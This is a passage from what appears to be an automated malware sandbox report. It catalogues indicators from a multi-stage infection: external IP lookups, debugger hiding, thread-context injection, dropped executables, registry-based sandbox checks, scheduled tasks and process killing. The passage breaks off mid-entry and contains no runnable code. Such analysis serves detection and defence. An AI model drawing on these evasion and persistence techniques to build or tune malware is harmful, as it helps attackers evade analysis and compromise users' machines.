msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\Y: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 17 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 138 ipinfo.io 209 ipinfo.io 389 ipinfo.io 2 ip-api.com 47 ipinfo.io 193 ipinfo.io 360 ipinfo.io 395 ipinfo.io 2 ipinfo.io 154 ipinfo.io 202 ipinfo.io 310 ipinfo.io 403 ipinfo.io 49 ipinfo.io 161 ipinfo.io 297 ipinfo.io 378 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs
pid Process 5924 6722478.exe 5920 F37OFtk5v9UdORoY8t4Donzo.exe 5256 S7koKpK33vLWjAxi5chFkuJ9.exe 5848 9Zb2WtRSw11ACQNzk2XLqI6n.exe 852 4844256.exe 5860 997740.exe 476 1959615.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 6040 VM2skHGFpeBDBysR6622fBC8.exe 4264 3782043.exe 17280 RuntimeBroker.exe 17280 RuntimeBroker.exe 17280 RuntimeBroker.exe 17280 RuntimeBroker.exe 17280 RuntimeBroker.exe -
Suspicious use of SetThreadContext 17 IoCs
description pid Process procid_target PID 4708 set thread context of 1064 4708 hgmCgKLLp6_aBM_p6OXdxhM4.exe 124 PID 4716 set thread context of 3232 4716 dyEvj3hC2t7OMuwoWXdKUmK3.exe 27 PID 5248 set thread context of 3232 5248 nxfL7_6XSgUfDUVDEan06Mbe.exe 27 PID 5612 set thread context of 5328 5612 024wC3SO_qVtbE4Y9Lz5RQz9.exe 258 PID 3940 set thread context of 3232 3940 control.exe 27 PID 5808 set thread context of 5700 5808 46puvSQnm9v3JLD7WOWMRWFL.exe 345 PID 5624 set thread context of 7356 5624 GcleanerEU.exe 391 PID 3940 set thread context of 7356 3940 control.exe 391 PID 1040 set thread context of 3992 1040 8CD8CA21.exe 430 PID 8 set thread context of 1440 8 E26D.exe 432 PID 7068 set thread context of 400 7068 3176.exe 439 PID 5280 set thread context of 8160 5280 beadroll.exe 468 PID 6664 set thread context of 7748 6664 BAEC.exe 475 PID 15384 set thread context of 17280 15384 RuntimeBroker.exe 741 PID 17280 set thread context of 52096 17280 RuntimeBroker.exe 779 PID 52096 set thread context of 52200 52096 WindowsUpdate.exe 780 PID 20680 set thread context of 23908 20680 QUKHyXjH3qRKVkqx.exe 789 -
Drops file in Program Files directory 23 IoCs
description ioc Process File created C:\Program Files\Windows Media Player\VWVYJDUJWQ\foldershare.exe.config ShareFolder.exe File created C:\Program Files (x86)\Windows NT\ZHuqoshybila.exe ShareFolder.exe File opened for modification C:\Program Files (x86)\Mrbnhc explorer.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat colorcpl.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe ZP0MR34BkzoGGsDYhHusS489.exe File created C:\Program Files (x86)\Internet Explorer\Gaexiwawisi.exe Hamivapasi.exe File created C:\Program Files (x86)\Internet Explorer\Gaexiwawisi.exe.config Hamivapasi.exe File created C:\Program Files\Windows Media Player\VWVYJDUJWQ\foldershare.exe ShareFolder.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe ZP0MR34BkzoGGsDYhHusS489.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe mXtIGk3ofwNa4d7r1RCLpLFz.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Zx0htBgAf3gZhfn9rCPnpedY.exe File opened for modification C:\Program Files (x86)\Mrbnhc\xfatghhxptwtr.exe control.exe File opened for modification C:\Program Files (x86)\Mrbnhc Explorer.EXE File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat colorcpl.exe File created C:\Program Files (x86)\FarLabUninstaller\is-PS1L5.tmp colorcpl.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe ZP0MR34BkzoGGsDYhHusS489.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini ZP0MR34BkzoGGsDYhHusS489.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Zx0htBgAf3gZhfn9rCPnpedY.exe File created C:\Program Files (x86)\Mrbnhc\xfatghhxptwtr.exe Explorer.EXE File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe mXtIGk3ofwNa4d7r1RCLpLFz.exe File created C:\Program Files\MSBuild\CPWRENHLDH\foldershare.exe Hamivapasi.exe File created C:\Program Files\MSBuild\CPWRENHLDH\foldershare.exe.config Hamivapasi.exe File created C:\Program Files (x86)\Windows NT\ZHuqoshybila.exe.config ShareFolder.exe -
Drops file in Windows directory 36 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI2900.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File created C:\Windows\rescache\_merged\3105762040\3638839668.pri compattelrunner.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\MSIE5D8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4583.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC341.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE3B7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI32A5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI372A.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF654218DB211F4343.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIB0E1.tmp msiexec.exe File created C:\Windows\Tasks\QUKHyXjH3qRKVkqx.job QUKHyXjH3qRKVkqx.exe File created C:\Windows\Installer\f806443.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI8F3B.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI4582.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF9A5619A81AAF79E0.TMP msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIEDBB.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\Installer\MSIFB55.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA621.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1055.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1C4D.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DFD22439F0BB2A7A6B.TMP msiexec.exe File created C:\Windows\SystemTemp\~DFAEC10FD5FACBD244.TMP msiexec.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\Installer\f806443.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI6689.tmp msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 64 IoCs
pid pid_target Process procid_target 6112 6140 WerFault.exe 167 5908 4064 WerFault.exe 99 5716 3324 WerFault.exe 101 2848 3612 WerFault.exe 107 4008 4600 WerFault.exe 109 4220 6020 WerFault.exe 194 5624 1560 WerFault.exe 154 5448 4872 WerFault.exe 153 5912 4708 WerFault.exe 143 2848 5872 WerFault.exe 160 4944 5684 WerFault.exe 152 5532 5124 WerFault.exe 161 4280 8064 WerFault.exe 319 7792 8064 WerFault.exe 319 2676 1900 WerFault.exe 278 6076 3956 WerFault.exe 184 1652 4040 WerFault.exe 229 1788 1900 WerFault.exe 278 7452 7392 WerFault.exe 318 7612 7548 WerFault.exe 314 908 7636 WerFault.exe 307 912 6952 WerFault.exe 428 2764 6952 WerFault.exe 428 1160 5392 WerFault.exe 437 4008 7068 WerFault.exe 424 3428 5392 WerFault.exe 437 8088 2584 WerFault.exe 302 6908 6228 WerFault.exe 376 6844 7744 WerFault.exe 308 7944 4228 WerFault.exe 409 3988 5280 WerFault.exe 455 8008 5280 WerFault.exe 455 6324 6084 WerFault.exe 459 932 6252 WerFault.exe 431 5464 8176 WerFault.exe 412 3004 8176 WerFault.exe 412 5564 3720 WerFault.exe 461 4056 5624 WerFault.exe 490 8316 3724 WerFault.exe 558 8176 30840 WerFault.exe 516 9376 31180 WerFault.exe 518 9432 8252 WerFault.exe 569 10436 49716 WerFault.exe 527 10580 50108 WerFault.exe 535 11516 7800 WerFault.exe 544 31908 11692 WerFault.exe 602 32008 31788 WerFault.exe 607 32356 8984 WerFault.exe 580 32596 9416 WerFault.exe 585 17224 15296 WerFault.exe 720 29440 48612 WerFault.exe 815 6812 46192 WerFault.exe 839 46836 30588 WerFault.exe 829 8416 6428 WerFault.exe 856 8768 7364 WerFault.exe 859 28368 9304 WerFault.exe 890 8848 5576 WerFault.exe 900 8252 5576 WerFault.exe 900 11212 49868 WerFault.exe 882 2004 10628 WerFault.exe 906 31156 8664 WerFault.exe 908 33660 32976 WerFault.exe 945 32532 32448 WerFault.exe 932 41916 40452 WerFault.exe 971 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 024wC3SO_qVtbE4Y9Lz5RQz9.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 024wC3SO_qVtbE4Y9Lz5RQz9.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 024wC3SO_qVtbE4Y9Lz5RQz9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E26D.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E26D.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E26D.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier GcleanerEU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6380 schtasks.exe 6568 schtasks.exe 6892 schtasks.exe 6552 schtasks.exe 3596 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 7288 timeout.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU GcleanerEU.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 10 IoCs
pid Process 3472 taskkill.exe 5412 taskkill.exe 31496 taskkill.exe 5548 taskkill.exe 32368 taskkill.exe 5600 taskkill.exe 6920 taskkill.exe 3792 taskkill.exe 3732 taskkill.exe 4060 taskkill.exe -
description ioc Process Key created \Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 control.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\1d75a0311147cb\a37dfe62 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.ECApp_8wekyb3d8bbwe%5Cresources.pri\1d75a03e943da6\a37dfe62 compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe%5Cresources.pri\1d75a02ff8a3e87\a37dfe62\@{C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d = "Microsoft Corporation" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.creddialoghost_cw5n1h2txyewy%5Cresources.pri\1d75a03103a4674\a37dfe62\@{C:\Windows\SystemApps\microsoft.creddialoghost_cw5n1h2txyewy\resources.pri? ms-re = "Credential Dialog" compattelrunner.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MRTCACHE\C:%5CWINDOWS%5CSYSTEMAPPS%5CMICROSOFT.WINDOWS.CLOUDEXPERIENCEHOST_CW5N1H2TXYEWY%5CRESOURCES.PRI\1D76C661473581\A37DFE62 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d75a17566f896a\a37dfe62 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppResolverUX_cw5n1h2txyewy%5Cresources.pri\1d75a03321138c compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri\1d75a03ea4ecf3 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Search_cw5n1h2txyewy%5Cresources.pri\1d781d71e731d27 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.11.11591.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d781d389655e16 compattelrunner.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local 